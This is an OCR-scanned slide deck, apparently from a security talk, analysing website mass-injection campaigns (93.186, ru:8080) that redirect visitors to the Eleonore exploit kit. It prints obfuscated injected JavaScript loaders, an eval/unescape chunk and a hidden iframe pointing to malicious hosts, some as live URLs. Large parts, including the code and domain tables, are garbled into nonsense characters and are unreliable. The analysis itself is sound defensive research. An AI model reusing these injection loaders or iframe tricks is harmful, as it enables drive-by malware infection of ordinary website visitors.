+ 






aponith.con 




+ 






purgand.con 




+ 






flZfizH gunentha .con 




+ 






HUM.bluehost.con 




+ 






5Gcentptr.con 




+ 






UMU.sedoparking.con 




+ 






onlinesertepkos.con 




+ 






12s83.con 




+ 






ad.HZ.cz 




+ 






ext.tyroo.con 




+ 
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Down the Rabbit hole 



Injection Campaign #1: 93.186.127.49 
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'W93.186" Injection Campaign 
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'W93.186" Injection Campaign 



ajax.googleapis.com 



200 




302 
302 2©tJP amasa ki-info 

niruj.com J*5 
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'W93.186" Injection Campaign SS 



'■ V-.I . K. I .-i | 

Q» Change a «lii^ 



4tj»tyNlt*OftEYXffi 



b-r stetn Km progress 





htsme? corner t»n end send then to Its creator. &athned irfwrnatioc c-ar> be 

ttmtuQKif, (i.niai f/^tnmi wki 4> l^tt titter **Kti rt tnpetwt f* ywn 



f* EmjiWwri^WiiriiLMyd lt | 

|? Irt-Dimldr.Wiit Crttiral 



K-U.2W9 

D9.37.31P9 



„„. 
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iservauons irom 



attack 
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Rascop.com. ..a familiar foe? 



ajax.googleapis.com 


2001 


g ^^ -*0r^ 

rascop.com T 
^^^^^^\ 3Q2 


27.4, 


302^\ , 


F 2Q(jpamasaki.info 


niruj 


com ^3 






hindger.com 
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1 

Infamous Rascop.com 


rascop.com 


i = NXD(feb10') 




Waledac 


;:::i:::r d 






Fast-flux 
domain 
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Rascop.com and friends gone but landing 
pages here to stay 



Waladec domains were NXD in the takedown 
Landing pages were still online though 







No. Ingress Connections 




clicksoi — con 


o 


£ ES s a 8 




eastnoneij.con.nobile-de.honesaleplus.ru 








HMM.google-analy tics. con 


- 


+ 






tobeyeu.con 


- 


+ 






huh. google. con 


- 


+ 






googleads.g. doubleclick. net 


- 


+ 






93.186.127.19 


- 


+ 






pagead2 . googlesyndication .con 


" 


+ 
+ 
+ 
+ 




[ hindger.con 


1 rascop.con 


sodanthu.con 




aponith.con 


- 


+ 






purgand.con 


- 


+ 






RZRzR"gunentha.con 


- 


+ 






uuu.bluehost.con 


- 


+ 






SOcentptr.con 


- 


+ 






uuu.sedoparking.con 


- 


+ 






onlinesertepkos.con 


- 


+ 






12s83.con 


- 


+ 






ad.uz.cz 


- 


+ 






eKt.tyroo.con 


- 


+ 
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Injection Example #2 
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1 

Popularity of Requests 


250/5k URLs lead to homesalesplus.ru 








No. Ingress Connections 

K K K> K> (. 

o 01 01 01 e 








clicksoi — con . eastnoney . con . nobile-de . honesaleplus . ru 
hhu . google-analy tics . con 


+ 


L 1 




t obey eu. con 


+ 








uuu . google . con 


+ 








googleads . g . doubleclick . net 


+ 








93.186.127.49 


+ 








pagead2.googlesyndication.con 


+ 








hindger.con 


+ 








rascop.con 


+ 








sodanthu.con 


+ 








aponith.con 


+ 








purgand.con 


+ 








RZRzR"gunentha . con 


+ 








uuu.bluehost.con 


+ 








SBcentptr.con 


+ 








uuu . sedoparking . con 


- + 








onlinesertepkos . con 


- + 








12s83.con 


+ 








ad.HZ.cz 


- + 








eKt.tyroo.con 


- + 
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5ENTIAL IHFOHBATUJN PROTECTION 









i - popularity o 
connection 



250/5k URLs lead to homesalesplus.ru 



aleplus 
ilytlps.i 
idanthu.i 



■lus.ru 

-- con 

con 



dicat: 
tobel 



Ser.con 
eu.con 
.uz.cz 

l.HZ.CZ 

googleads . g . doubleclick I net 

r* r ouenHa.con 

- - £l*f-oi — f ra^co.cc 

HZHzH guneptna.con 

nefa.us 
onlinesertepkos.con 



iner. 



4analutics.org 

b ish2nsn35§ I con 
4analytj.cs.r~ 
. .B.intecia.i 

interna, bit. genius.. I 
HHu.Freegiiara.D 
go.testneBs.con.i 
counter . y aaro . ri 

... ,77.^1:!? 

kiko.lacoctelera.nei 

uuu.youtube^con 

unlock. nn 

2analytics.us 

s7.addtbis.con 
uestnortns.cn 
nun anna rnn 
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Injected Code Variation #1 



<script> "C0DE1*.- try {window. onload = f unction(){var 

Q236s4ic4454clw = document . createEl ement 

('script ');Q236s4ic44 54clw. set Attri but e(* type', 

'text javascript ');Q236s4ic4454clw. setAttributeC id\ 

'myscriptl ");Q236s4ic44 54c1w. setAttributeCsrc* , 'h(t) ! 

AtA))p#^:A&/(##/&j#cAj$lA^)(i^(c$A)k))#$sAo$#r»A)A- 

S$$&cA$o#Aai$!#.#&(e((a! !s)(&t)to(Co&AAn!$! e&A& 

CyS~).*&cS$oS&!SAm(«(.&m&^ 

(. ) )<3&h)®3@oAA@m ! e#&&)s) a»S SI S S«e ■■ £ : p ' £1 &3u# C (asa#©(, S) 

r SSu( : ! S3 ! S0&S&8)&S0S ! ) ! o#«£c#*<Mn (Qa i . ))n@e®. )&j ! 

A#Sp*/)A<a AcAn)CC. ()nA)eAS.^!)Sj! !A(p#; <a&)cA(l&(a&s(As@! 
mA@a(SAt^e!#A<3i)sS.AcA&#oCC&m& ) (&n&Qi (£n) (k$£h&e)&S(l) 
SpA ! e) S ! Sr $#. )&c ! &n(S& Sg*QA<l&Q ! SSqSaI *&me$. &&\ c#o^SSm(, 
SS ' . replace(/\( I \! |&|#| \$ | \) |®| \a/i g, 
' '));Q236s4ic4454clw. setAttri bute( * defer f , 

defer '); document. body. appendchild(Q236s4ic4454clw); }} 
catch (e) {}</script> 
< textareax form> 
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Injected Code Variation #2 



<script>, *LGPL K . try{ window, onload = f unction (){var 
Kdxcthy92mqwy = document. createElenient('s#((c$$S&rA&$i (@ p i 
£t*" . replaceCACIM I#I\S|\a|\) |&|@/ig, 
' *));Kdxcthy92mqwy. set Attribute (' defer', 'd!eSS) 
&f A@e $ (&r # ' . r ep 1 ace ( . ( * $ £ I & ) i g , 
" '));Kdxcthy92mqwy. set Attribute ('type* , *t###®! e&(x)t&)($.' 
Cj!)a^vSS)a^(CSsA!^)Sc<a!)rC&i !SpS*CO *. replace (/a |\! 
l#l&l\)l\$I\ A l\(/ig, * , ));l<:dxctny92^^qwy.setAttributeCid , , 
'5 =^2AA0CS&AdA#d)A)#)iAi)aS<?^u)i&Aa&CCg&2&gC)*C i . replace 
C/\)|\S|\a[@|#|&| V I\C/ig, ' *)};Kdxcthy92mqwy. set Attribute 
C*sAr«c$A! \replace(,\)|\A|\! |#|®|\si&|\(-'ig, * '}, h& 
(t-t)pS:*) '&(&S. , -^C«k&)e<&eSS2«#fflCr}<9oSSvAii&i#SeSS&sS-)A&> 
dec : * (oA-5»ir@^S . &o&d ! S ' e («£sC ( >k S • . <?£ (c ■■ o : &-m ( $) &. &) n-b 
CCa^-&)A)c*)(»Off!eAm&SA.S! ! ! )t#!@h!«e&$c(^hS&o(&Ac!«so&" 1 
Ca&)t*AAe(&v( a ! Ae t )b t . & r (<au ! : ! ) 8 ! 0a*a8) ! @0# ! ! /*&)t&i 
(£n&S$y& A u*@&rAAi *&(*#. » s&*c C I oaa < $&nxa)* $ ! S&t&i Sn (y! ) 
CuAS&*r^))l!S<^.)cAAA &mC A C Cf)!*!r!Oi&Sfe!An*d)) 
fMee#&e#! ! ) ! d*&) . ))c) ! A #*&m! a$& ! (&!s(&o&($£f#t (o!£n* 
(Ai&S&c&&!A. !&c#&o)Arti)#!/(@gS&Sto£fOSASq^SAlS#e*. (c*!&)o! 
S^#&mS/At ".replace( ! ) $ & » ' © ( ig, "));if 
(document) {document, body. appendchild(Kdxctny92mqwy); }} } 
catch CHgsusm4sqb4ev;eekzkh) {}</script> 
<!-- e3d7fda78c66a21182b6e8f6bf4df79a-- > 
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Injected Code Variation #3 



,/*GNU GPL* try{v;indow. onload = f unction (){var A84jbd5xsu = 
document. createElement (* script '); A84jbd5xsu. setAttribute 
("type" , text javascript '); A34jbd5xsu, setAttributeC id\ 
'myscriptl'); AS4jbd5xsu. set Attn but e(src" , "hA&(t)St (! a p 
(SA(:S<a( ! !) &x! Q$n&!Sx&! !&xA!&(-(c#)o*!m! !(*$nA!#(uA 
CC^)#n&!C1S^.#A(^v;SC)3&)C-So)#rSACg)(a!&^#&gCAo!&l!)&d! 
iAg9&)oM#lAAf(!b! !a#)#®gA$A$.#(AAr)£#u$! : !&$5s)o&)*8#! 
(o * Gw() SAe&(&e&h)&1M#y£$ ! - ec*&&0)e* ! S»S®/$$Mw$A)®eAe ! 
(b))l(Ay&)&OCc! ! !0A&m! (Sa (a)!1; i &(a! A$ r &! e*&d$! #o) C A u(t 
(e$ (. Sf &! r ! $ ( ! ! gS ! a)&oa&*So©*S (g@ A l *# e A r (. ) (& c ! $ ) 
S&n£A&/## ! )#ri<M ! #has (c) ) ! $o#&)n&( ! dA&e&l M&v&)a($$! g& A ) 
#o#&A! . ((ac&)&&o! ! ) ! m! /)$' . replace(/@|\A | ) 
*.& S ( : ig, " '));A84jbd5xsu.setAttribute( , defer ', 
defer *); document. body. appendchild(A84jbd5xsu); }} catch(e) 
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Depth - Diff DOM/SRC 




I Col: 1, I 



Col: 1155/1222 Ch: 1155/1222 1252 



.1 pt t.ype= "text./ j avascript " id= "rtiyscript 1" src= "http: //click so r-coi , eastmoriey . corn . mobile- de , homesa^ 

>| 
Difference 145 of 145 
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Depth - Script link in DOM 




I-, 23 .. Col 1/S37 Ch: 1/837 1252 



Col: 1155/1222 Ch: 1155/1222 1252 



.1 pt t.ype= "text./ j avascript " id= "rtiyscript 1" src= "http: //click so r-coi , eastmoney. corn . mobile- de , homesa^ 

>| 
Difference 145 of 145 
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Injected Code Variation #3 



, v GNU GPL x try {window. onload = f unction (){var AS4jbd5xsu = 
document. createElement (* script '); A84jbd5xsu. setAttribute 
(type' , text; javascript );A84jbd5xsu. set Attribute ('id' , 

myscriptl); AS4 jbdSxsu. setAttnbute('src \ 'hA£(t)$t(!Ap 
(Sa( : S&( ! ! ) @x! Q&n&l Sx&! !&xa ! &(- (c*)o* »•!•(. Sha [ #( u a 
CC^)#n&!ClS^.#A@@v;SC)3&)(-So)#rSA(g)@!&.<a#&gCAo!&l!)&d! 
iAg®&)o&S#lAAf(!b! !a#)MgA$Ae.#(AAr)£#u&! : !&$SS)0&)*8#! 
(0 * 8wQ SAe&(&e&b)&l<3S#y&S ! .&c&&&o)&a ! $m$& SS<S&wSA)&eAe i 
(b))l(Ay&)&OCc! ! ioA&m! ($A/(A)ni !&CalASr(^!e#&dS!*o)CAuCt 
(eS(. Sf &! r ! S( ! ! gS ! A)& A£#5o$*S(g£Al**eA [ (. ) (&c ! So) 
S&ftA& /##! )*rMi !#nA$(c)) ! So*&)n^(! dA&e&1#0&v&)a($$! g& A ) 
#o#&a ! . ( (a C $) &&o ! ! ) ! m ! ) S ' . r epl ace ( /@ a ) 

» .& " S C " ig, " , ));A84jbd5xsu.setAttribute( , defer ", 
* defer * ) ; document . body. appendchi 1 d (A84 jbdSxsu) ; }} catch(e) 
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DOM View 



DOM ==> Mutable Memory representation 
(Final View of DOM after JS/events) 



<script type="text/javascript" id="myscriptl" 
src= M http://c~Mcksor-com. eastrnoney. coit. irobile- 
de. hoiresaleplus. ru:808Q/ocn. ne. jp/ocn. ne. jp/ 
cla55irate5. com/1 inkhel per . cn/'google. com/" " 
clef er = " defer "></scri pt> 
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Log Analysis 



Further Analysis showed variations: 

hxxp://clicksor-com. eastmoney.com. mobile- 
de.homesaleplus.ru:8080/ocn. ne.jp/ocn.ne.jp/classmat 
es.com/linkhelper.cn/google.com/ 

2. hxxp://chip-de.ggpht.com.deezer-com.viewhomesale 
.ru:8080/google.com/google.com/timeanddate.com/avg. 
com/zshare.net/ 
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ru:8080 URL Injection Campaign 



Similarities between infected sites: 
Port 8080 
Various changing .ru domains 

Legitimate content on port 80 served by Apache 

Malicious domains are mapped to 5 different IPs 

Malicious IP addresses are on hosting providers 
Leaseweb (Netherlands) and OVH.com (France) 

Landing domains were NXD Dec 09V J an 10' 
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The Never-ending story 



Fresh injections 
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Observations from ru:8080 attack 



Compromised websites can and are updated automatically 

Compromised websites are injected with multiple 
redirectors 

Sharing of stolen FTP credentials 

e.g. Many infected sites also led to Gumblar infected 
domains, indicating that attackers perhaps had shared 
stolen FTP credentials 
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Injection Example #3 



Mass Injection #3 

-5700 infected pages 

-5300 unique hosts... sent 1k for analysis 



*3;l*22*23*;}-;i-3;l-;;l- ll-.':-.' r:2 r-'l- 3;it"2 T2e*8 ,, +"9S6"+"eS6"+"4S6"+"5%78*4f 
^ 6 i 1 + i 16 ii+i. % 23V2:iV:2V2]:V^4r2!:%2:ridV2:V2;V2;r21V;dr2dV;i.V2;i2;T , :];-V20i71%75*6 ll + ll 5 
*3d*72*2e*73*75*6 l, + l '2*73*74*72*6 ll + ll 9*6 ll + ll e*6 |, V'7*28*71*2b*32*2b*74 
%2e%6 l, + l, c%6 l, + l, 5%6 l, + l, e%6 l, + ! '7%74%6 ,, 4- , -3^23^2e^73ii!70S!6 ll + l 'cS!6"+ l, 9S!74S!28S!22&iS22iS29iS5b 
%30%5d%3b%0di!0ai!6 l, + l, 9i!6 ll + ll 6 l, + ll %20<23i23i':ii7o>6 ,, -H , 'Dii2e%6 ll + l, 9S!6 ll + ll eS!6 ll + ll 4S!6 ll + ll 5 
%78%4f%6 l '+ l '6 ll + ll %28%27%73*6 ll + ll 9%74*6 ll + ll D^3£i2^V2;V3dV3dV;;ir31:2;:23ii%20S!28S!71 
i!75i!6" + "5%2e%74%6" + "f%4c%6 l, +"fS!77*6"+"5S!72S!43S!6"+"lS!73S!6 l, +"5SS28S!29 
%2e%6 l, + ll 9%6 l, + ll e%6 l, +M%6 l, + l, 5%78%4f*6 ll + l, 6 |, + ,, S!28S!27S!77S!77-V'"':i2er2':i2jr3:l%3dS!2dS!31 
V;;V2;V3ciV35.V3.;V?- + - 4^"' + ' :-; -' 3-"5^S" + l, dSs6 ll +"5S!6 l, + "e<74%2e<77%72*6 ll + "9 
%74*6 l, + l '5*!28>!22>!3c>!73>!6 , '-H , '3>!72>!6 , '-H , '9>!70<74^20^73^72^6 , +"3>:3d%27S!6 ll + ll 8S!74Ss74 
Ss70*3aSS2fSs2fS!6"+"2S!6 ll +"5S!73S!74!!34!!79S!6 ll + "fS!75S!2eS!6 ll + "9S!6 ll + l, 6"+ ll S!2eS!75S!6 ll + ll l 
%2fSs6 l '+ l 'a>i73S!2fS56 l, + l, 2%6"+ l, 9S!6"+ l '4S!6 ll + l '3S!6 ll + l '8SS2eS!6 ll + l, aS!73i3:i , :ii3cli:22%2bSs71S!75 
%6 l, + l, 5%2b%22&%72%6 l '+ ll 5%6"+"6 l '+ |, %3dr2;r2]:r"2r2];r22r2"i3er:vr-'2:>:73i!6 l, +"3i!22i!2b 
*22-*"2 ■*?" + ' ;^"::^"4:3e^;^;^ 3]:: ::l-:f.-":l- ::;■:?.:":;■ ::;■:?.■"•;■ + "*S" + "l*':;*20io" + ";l 
*79Ss6 ll + ll 9Ss6 l, + l, bS!3d*74*72*75*S ,, -i- l, 5Sj3b 11 ) ) ;</scriptX/HEAD> 
<BQD"f LANG="en-GB" DIR="LTR"Xscript>c01z635= l ' ;r7c64baee9=' r5e251 ' ; 
re3];S]::':0e3Cr= , rS52d7' ;r03bdal6e7bb=/+ rll39da4Sc 
Vdcc.iif.eat .■ String, constructor .prototype .^'.£.T.£=re j]:£b70e807; 
rNEW=Gb j ec t . c c Q3 1 rue t c r . pro t c type . mama ; 

if (r7c64baee9+c01z635+rHEW='r5e251r652d7 l ) { r52ae0c52o8 = r0 3];:UilSe7bb} : 
r52aeQc6258.vrrite{'<scr l + 'ipt>function r5e7c65 :r0ea2S:< (return 
e'+c01z635+'val(r0ea26) ; }</scr '+' ipt>' ) ; function 

c0127c4b23r0116d(r8b3a0dH var z3e7=' '; return (r5e7c65 ( 'parse '+z3e7+' Int 1 ) 
(r8b3a0d,16)} ; } function r:S3cela:3 :rl7l3];2e];: { var ra253cbo2a4=' ' ; 
ra9739f3=' fromCh 1 ;rf95b4=Strin;_r[ra3733f3-i-' arC'+' ode ' ] .■ for (raec264=0; 
raec264<rl , :i3];2e];,leLi;rf:-i.'r£ec2£4+=2:. { ra2£3cb52a4+= 

<rf95b4 (c0127c4b23r0liScl ;rl713];2efc . substr :>aec264,2) ) ) ) ; } return ra268cb52a4 : } 
var 

rfdd37='3C7363726970743E6675CE6374696F6E20636865636B5r636r6E74656E7428297B7661'H 
?zl;.s2:ill?.:--?L-.e rf :3relc.f ? r:'=l~";; < 5:ri:;:> 
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Breadth - Popularity of Responses 
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Breadth - Popularity of Responses 



77*221 , 153 *178 

uuu . ijahoo , can , can 

uk + (jahoo + con 

trustteobiz.cott 

WHH*gDOglc * DDH 

e oo e lc.oo w - 

cpartgun 4 pi »ua 



Na. h tress Corrections 




sportgun.pl.ua very common type of attack 
sends a response back to 50+ hosts 
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Connection Request/ No Response 



Src: hxxp://sportgun.pl.ua/st/go.php?sid=2& 

Dst: hxxp://uplevelgmno.vn.ua/1 1 1/sv777/index.php 



howtofindmyip.com 
,302 



s 





gmno.vn. 
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Round #2 Connection Request/ Response 



Success! 



mm.chitika.net 20(F howtofindmyip.com 



levelqmno.vi 



scripts.chitika.net 
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Fetches Exploits 



Fetches PDF and Java Exploits 

connection: 

type: response 

src: hxxp://uplevelgmno.vn.ua/1 11/sv777/pdf.php 

dst: hxxp://uplevelgmno.vn.ua/111/sv777/index.php 

status: 200 

connection: 

type: response 

src: hxxp://uplevelgmno.vn.ua/111/sv777/dev.s.AdgredY.class 

dst: hxxp://uplevelgmno.vn.ua/111/sv777/index.php 

status: 200 
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PDF VirusTotal Results 



►I 



VIRUS 
TOTAL 



Virus total is a service that analyzes suspicious 
files and facilitates the quick detection of viruses, 
worms, trojans, and alt kinds of malware detected 
by antivirus engines, More information,., 



File pffl,p<tf_ received on 2010,02,22 20:25:36 (UTC) 

Cur ire nt status : f in is h t d 

Result: 9/41 (21. ©5%) 



Name Description Reference 

Adobe Collab overflow Multiple Adobe Reader and Acrobat buffer overflows CVE-2007-5659 

overflow Stack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printf CVE-20Q8-2992 

Adobe getlcon Stack-based buffer overflow in Adobe Reader and Acrobat via the getlcon method of a Collab object CVE-2009-0927 

, ,. „, Use-after-free vulnerability' in the Doc.media.newPlayer method in Adobe Reader and Acrobat 8.0 through _,,,_ _ nnri .__ . 

doc. media. newPlayer q ? CVE-2009-4324 



websense 



Eleonore Exploits Pack 



hxxp://uplevelgmno.vn.ua/1 1 1/sv777/stat.php 



<bc dy i d= " go rdc mrac - com " c 1 as s= " hcxtepage " > 
<div id="wrapper-a"> 
<div id="v/rapper-b"> 
<div id="heading"> 

<hlxa href="#">Exploit PAck</ax/hl> 
<h2>Exploit pac£</h2> 

<p id= "heading- in tro"> 
Eleonore Exploits paci version 1 . 3 . 2<br> 
Please enter your login and password. 
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^1 

Obfuscated Chunk in Source Code 




howtofindmyip.com obfuscation 






<script>eva1 C unescape( '"io"'-"^^"'-"*"-" 1 ^-! 1 ::!^"-' i=r-j=:c' - i:c -' :- : :29 : rb : : 
■:id e oUc.'i T 5 ,, + ,,e o5 ,, + ,, l e o T : : ::0=:": : :: ^o'V'^o'VT^o'V'S^E'io'V'd^o'V'S^e'V'e?^^ 
2e ; r2 i io ,, + ,, 5 ; i5V ,, 5 ,, + ' ,; i5V ,, 5 ; r2 ; r2 ; io ,, + ,, 5^-:^:c^-5^3d ; io ,, + ,, - i i5 ,, + ' , f ; io ,, + ' , 3%7 5% 
6' , +' , d^5 ,, + ,, 5 ; ioV ,, e ; r-^2sS5 5 : ,;2S-c : : :c : :-- : :::: : ::: : :2: : ::c : :-: : : 2c- : o T l ; r5 ; io ,, + ,, 5 ; i2c ; i 
"3 : ; c"-"5 : =: ^::^c''-''"^5''-'':s::^:^0d : iUc. e iS ,, + ,, y e io> ,, 6 ,, + ,,e i25'i T 2 e i2e e iS ,, + ,, 9 6 ii 
o"-h"e c i5"4-"- c i5"+"5Vi c i-f^5" + "o' ! - ' : :Z : : : 2 2 : : r- ""'i5" + "Pio" + "f c i5" + ""'i5'V'c c i 

c"-"5 : ::s : ::: : ::-' : ::: : =: : : ::: : : :: : : :i : : "•:■=:" -=: : : :Z2 : : : 2Z:: : : : : : ;3 - "5 : =: :: : =:: : :c"-"~ : : 

o' , + 'T c io>'T c i5> ,,TC io> , ^^io ,, + ' , 5S2:^:^^"::^::::^::r^c'- ,, ^io> ,, 5> ,,c i2^o"2 ,: i2e c i 
o , V , 9 c io> ,, s'i5> ,, -'io , V , ^i-5'i-f'i5 ,, + ,, 5 , V 

3d e i2dS3is::^"^"-^:;^::s":s::^:^":^c''-''3s:c:s::^5 ,, + ,, dV3 c b5 ,, + ,, a e i22 c i3b e rd^ 

0d c i0^5> ,, 9<i5> ,, 5 , V , <i2S^2<i2e<i5 , V , 9<io , V , e^ 

:: : :"^ : :5"4-"i c i5"+"5 c io"+"f c io"+"f c i2e : ::: : ::^ : ::: : : : :: : :::: : ::: : ::^ : :--.- : :-- : ; ::: : ; :: : ro c i22 c i 

3b^3 c i5> ,, 5 c i3d c i2 2 c r^i5> ,, ri5> ,, S c i5>' , f c b5 ,, + ,, Pi22 ,: i3b c i"d c i0d c i0^io ,, + ,, 9 ,: i 

5" + "€ ,: i5" + "- c i5" + "5 c i"S c i2€ c i"2 c i"5 c i22 : ::^ : ::: : :::: : :::: : ::: : ::^ : :"^ : :"- : :: I: : : 2 2 c o"-' : i5 " + " 3<i 

":.^--^:2s:v-^":^c / -' :^:::^::^"^^c''- , i^5 , 'i ,, 5^o ,, f' , - ,: i5 ,, + ,, 5v.; : ::£ : :": : :"5 : :22 c i3b c i 

-d'iOd'iO^io'V^o'V'^V'^S'w-^s^'V'c^ 
T l e i3d c r2 e i2e e i5> ,, 9 e *5"VVi5> 1 U e i5> ,, S e i7S e ^f e ^ 

22 c i3d c i22S2J : ,2J^2I^3d^.2dS3I ; rc c rc : ,25 : ri : ,3d : r2 : ,2a : ,5 ,, + ,, ^i5 ,, + ,, a c io ,, + ,, - ,: i5 ,, + ,, 5 c i 

"•i : :-f : 5 c"-"c"-" : :: £ : :::i: : =:: : 5 :-:- : :"- : :: ■:.=:: :==: :: : ::: : : ::: : : : jmim : : ::: : ::: : ::: : ::: : :-; : : :: : : 

2b%74%2e^5 ,, + ,, c c i5>' , ^i5V ,, a c io ,, + ,, - c r- c io>^£ c i2JS2;^-:^-:: : : c'' + ,, c c i5 ,, + ' , 9^74%28% 
2 2S i c i2 2 c i2-J^3v-^:0^3::^::-^0::^U3. c i5 , ' + ''^i5 , ' + ''o'' + '' c i2N : :2L : :2-£ : :"l : :"3 : :c' '-' 5 : : 2s : ,5" + "9% 
6> ,, e%6> ,, 4%6> ,, 3^5 c i-f c io ,, + ' , o ,, + ,,: : :£ : :2- : :-: : : 5 ,, f' , 9 ,: i-- c ;o ,, + ,, 3 : ::r : ::- : :::: : : 3d c ;3d c i 
2d c i31 c i2 9^2 0&£ft2 0^2S^~l^~5^5V''5 c i2e c ^^ 

73K6"+"5%2S%2^2GK6>' , 9 i i5>' , e^5%'U^6' , + ' , 3^7S^f^5> ,, 5>' , ^2S^2 T ^^ i: ^^^ TC i 
:e : : :" : :::; : :] : : :3 :: : : ::: : : :: : :2 j^2 J : :-:::: : : ; ::i : :-::9 5 io'' + , '4 c i6 ,, + ''f c o5 , ' + , '3^~S t i5 , ' + , 'd c i5'' + ,, 5 c o 

;"-"£=:--==: £==--=:" : : :c"-"5= 5 -- : 5 o"-"5=::e; : ::: : :^ : 5 ": : 5 c' - : : :~: : :3 - :i= 5 --:: : ="- : :2u c i T 3 e i 

72^5%' , 3%3d^27^5' , + ' , i%"-^"-^"::^:^^:^^.2f^5 ,, + ' , 2^6> ,, 3 c r:^"-^-- : ; "9 i io' , + ,, f^3 I i 

:£^3'' + ,, 9^o> ,, o ,, + ' , ^2s^3 i io ,, + ' , l ; i2f i i5>' , ^^3 ; i2f^o ,, f ,, 2^o ,, f , '9^o ,, + ,, - ; i5' , + ,, 3 i i 

6" + "S ( »2s^" + ";.V: : ::f : :-: : : : :i : zZZ : z2h c i~Vi~5 c i5'' + ''5 t -zZ-:- : zZZi: : z'Z : ^'' + ''5%5'' + "5''+"%ld% 

:: : =:t : =-: : 5 : ■:■==: : : ::- : ::£ : =:-c : 5 :^ : 5 ": : =c'"-' : : : z: : : z: : ::: : :: : :; - i : : - 0==--==: £= 5 =z==z j==5t.== 

0d c i0^i T d^::^c.\~::^0::^:?S~5 , V' c o5 , V'l c o~2 c o2C^^ 
7 5%6"+"5%3b" ));</script> 
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Deobfuscated DOM 



howtofindmyip.com deobfuscated 



<3cript>s-c.l :' i..rsscc.ps:' ,,: ; c"-"J : DC , '-"c"-" : s 2i : :2I = 5 c"-' J : r-j==c' -"-j= ; c' -' ■.-■Sj-jV [:■=;> 

■:id e oUc.V5 ,, + ,,{ o5 ,, + ,, l e o":-::-:: = :": : :: ^o'V'^o'VT^o'V'j^S'io'V'd'io'V^io'V'eV-'i 

2s ; r2 i io ,, + ,, 5 ; ioV ,, 5 ,, + ,,; i5V ,, 5 ; r: ; r2 ; io ,, + ,, 5V2^:cV:S3d c oo ,, + ,, - i i5 ,, + 'T ; i5 ,, + ,, 3 ; r5 ; i 

o" + "d' : oo"+"5 ; i5"+"^r- : :2£ : ::5 : :!: : :-C : ::C : :-- : :::: : ::2 : :2: : :2C : :-: : :2C : :-: : :-; : :c' '-' 3:2C : : 

73%6% ,, 5%3d ; i22 ; io ,, + ,,T; i5V ,, 2 ; o2 2^:^^::::^::?^5 , V ,, J ; oo ,, + ,, 5' , + ,,; s 2i- : -2^2e ; o5 ,, + ,, 9 ; i 
o> ,, e c io ,, + ,, - c i5' , + ,, 5Vi c i-f^Q>' , o> ,,c i2 5 c i22 c io ,, + ,, " c io ,, + , T c io ,, + , T c i5 ,, + ,, " c i5' , + ,, c c i 
+ "5 c i2e'o22 : :2J : : :: : : : :: : :2:: : : :: : : 2J : :"^ : : "- : : : :; : :22 : : ": : :2: : ::^ : : ": : : c , -'3 : ; ::J c o22 ,: i5" + "" c i 
+ 'T^5' , + T c i5% ,,TC io ,, + ,, c c i5 ,, + ''3^2 2^:^^-::^0:;^0.?^o ,, + ,, 9 ; oo> ,, 6> , ' c o2i^2 c i2e c i 
5 '' + ''y^ 5 >'' e ^ 5 >'-^ 5 '' + ''^--5^f^ 5 '' + '' 5 '' + ^ i 2S c o22 c o6 ,, + ,, dV] c o5> ,, e c o2^i22 c i29 c i21^ 
3d c i2d c i31 c i2JVbV-%3dS22^"IS2:^:;^":^c , -'3^:::S22^c'-'::^-3^5>' , e c i22 c i3b^7d c i 
0d%Qa%6> ,, 9^5%' , 5'V , ^2S c i _ 2<i2^i5 , V , 9<io , V , e c io , V^^^^^ 

22 c i"9 c i5" + "l c i5" + "5 c i5"-h"f c i5"+"f : :2E : ::: : :2^ : :2: : :.: I: : : 2 I: : : 3 1 : : I 9 : : " : : : " - : : 3 J : .,2 2%~ e i2 2'i 
3. : :"3:3 - 3:3 I: : : 3 2 =:" 9 : *5 " + " l e o5 " + " i e o5 " + " f %5 " + " f : : 2 3 : : 3 : Z : " : : :J Z-.-V Z-'-. 3 " 4- " 9 C i 

5 » + " S - + -c i ;2.iv: e i:s c iS ,, + ,, ii e i5 ,, + 1, a e b5 ,, + ,, - : :c' '-' 3 : : " 3 : ,-f : i5" + "o" + " c o2i^22 c i"9 ,: i5" + "l c i 

5 ,, + ,, € c i5> ,, - c i5> ,, 5^5 c i2€ c i"2 c i"3%2 2 : :2^ : :2: : :3:: : :2:: : :3: : :2^ : :";- : :"- c i 3d c ,22 c i"- ,: i5 ,, + ,, 3 c i 

~ i, -:22,3 -,~: : : 3 '-" 3 : :3:: : :2 2 : :"^ : : c"+"1^5"i"5 ; io"-H"- ,: i5" + "3V.i : :2£ : :"2 : :"3 : :22 c i3b c i 

-d'iOd'iO^io'V^io'V'o'V'^S^-^^io'V'c^^ 

"l ; i3dV2 ; i2^i5"+"9 c i5" + "^io" + "- c i5" + "3 c i"5 c i-f c i5" + "5" + ' ; 2 1 : 1 2 : 2 ^ = ; 2 2 ; I : : " - i2 b c i 

22 : ; 2d : ,22 : :2:; : :29 : :21 : :3 :: : :2 :: : :3 1 : :" c : :"c : :2 3 : :"1 : : 3 : : :' 3:3 £ : >5 " + " 9<i5 ' V e'io ' V - c i5 " + " 5 c i 

-l : -.-- : : = "- "3 "- :2 3 : : 2 2i : :2 2 : ;2^ : _ M -=ZZ = ,2 ! : : 2 2 : 2 9 = : 2 i : : 2 2 : 3 ! : 2 ! : : 3 2 : 3 9: 2 i : " V: 2 2 : 

"l c i"3 c io"-l-"3 ; 3u: : : "2 : : 2s : : "3 : :"3 : :c' -' 2 : : " 3 : r-^2 c io" + "9 ,: i5" + "3 c io" + "" 7C i2.£. : :": : : 2 - : =3 3 : : 

233 : :22 : :2^ : :3- : :3-:: : :3 :: : : 3 - : :2: :: : : 3^ : : 3 > " 9 c io " + " o " + " ,: i2 2: : : 3 2=: 2 3=: " I : r 3 c i5 " + " 5 C ;2 5 c io " + " 9 c l 
6" + "e%6"+"4%6" + "5°;-5 c i-f c i5" + "o" + " : :2 2 : : 2- : :-3 : ; 6"f"9 c ^- c ;o" + "3 : : 3r : :3- : :2:: : : 3d c i3d c i 
2d c ;31 c ^9^2::i/2^2:^2; c i~l c r5<i5>' , 3<i2a<i T -^ 

"==* - ■ y,-.i'-.-.r-r.^ - 9^3 - ^3 - ^3 - ■;=="==--==£ - 3 - ■■■■..-.v,i"-,-"-"v^ 



<i frame height ="31 5" width="679" styl 
+frat(H.round(maTh.random() ! - ! ^ii88S)+= '" 



e=" visibility: hidden;" 5e96db=' 



src="http://sportgun. pi . ua/st/go. php?sid=2& " name="c01"></'if ranre>"; 

~5 c i5'V'5 c i3b M ));</script>- | 
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Exploit Kit 



uplevelgmno.vn.ua 



func t i on i s_s cl j a ( t y bay . pre c J { 


